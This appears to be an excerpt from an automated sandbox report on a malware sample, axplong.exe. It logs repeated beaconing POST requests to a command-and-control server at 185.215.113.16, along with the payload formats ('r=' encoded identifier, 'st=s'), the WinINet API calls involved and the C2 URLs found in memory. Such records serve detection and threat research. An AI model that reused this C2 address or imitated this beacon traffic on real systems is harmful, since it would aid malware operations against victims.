Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View

IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown

DNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_000FBD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

6_2_000FBD60

Source: global traffic

DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000006.00000002.3328635806.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php(
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php-
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php.
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpE
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpI
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpL
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpN
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpO
